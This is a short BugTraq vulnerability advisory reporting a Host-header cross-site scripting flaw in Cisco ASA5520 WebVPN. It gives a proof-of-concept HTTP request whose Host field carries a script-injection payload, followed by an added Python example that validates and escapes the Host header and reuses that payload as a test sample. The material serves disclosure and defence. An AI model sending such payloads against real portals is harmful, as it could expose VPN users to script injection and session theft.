BugTraq
Cisco ASA5520 Web VPN Host Header XSS Mar 31 2009 10:17AM
Bugs NotHugs (bugsnothugs gmail com)
- Cisco ASA5520 Web VPN Host Header XSS

- Description

Cross-site scripting.

- Product

Cisco, ASA5520, IOS 7.2(2)22

- PoC

Modified request:

POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org
Accept: image/gif, image/x-xbi...
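
A server-side check for the kind of request shown above, as an added example that is not part of the original post and is not the vendor's code: it validates the Host header against strict syntax and an allow-list before use, and HTML-escapes the value wherever it is reflected. The hostnames in ALLOWED_HOSTS, the function names and the header dict shape are assumptions.

```python
import html
import re

# Assumption: names this portal legitimately answers to (placeholder values).
ALLOWED_HOSTS = {"vpn.example.com", "vpn.example.com:443"}

# Strict syntax: dot-separated DNS labels plus optional port. IPv6 literals
# are deliberately not accepted in this sketch.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOST_RE = re.compile(rf"(?:{_LABEL}\.)*{_LABEL}(?::\d{{1,5}})?")


def check_host(value):
    """Return (ok, reason) for a raw Host header value."""
    if value is None or len(value) > 259 or not _HOST_RE.fullmatch(value):
        return False, "malformed"
    if value.lower() not in ALLOWED_HOSTS:
        return False, "not-allowed"
    return True, "ok"


def render_portal_link(host):
    """Reflect the host into HTML; escape even though it was validated."""
    safe = html.escape(host, quote=True)
    return f'<a href="https://{safe}/+webvpn+/index.html">Login</a>'


def handle(headers):
    """Return (status, body) for a request's headers (dict, hypothetical shape)."""
    ok, reason = check_host(headers.get("Host"))
    if not ok:
        # Never echo the rejected value back into the error page.
        return 400, f"Bad Request: Host header {reason}"
    return 200, render_portal_link(headers["Host"])


# Constructed samples; the second is the Host value from the post above,
# with its two wrapped lines joined by a space.
SAMPLES = [
    "vpn.example.com",
    "\"'><script>alert('BugsNotHugs')</script><meta httpequiv=\"\" content='\"www.owasp.org",
    "other.example.net",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(handle({"Host": s}))
```

Escaping in render_portal_link is kept as a second layer so that a later change to the allow-list or regex cannot reintroduce reflection of raw markup.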

Copyright 2010, SecurityFocus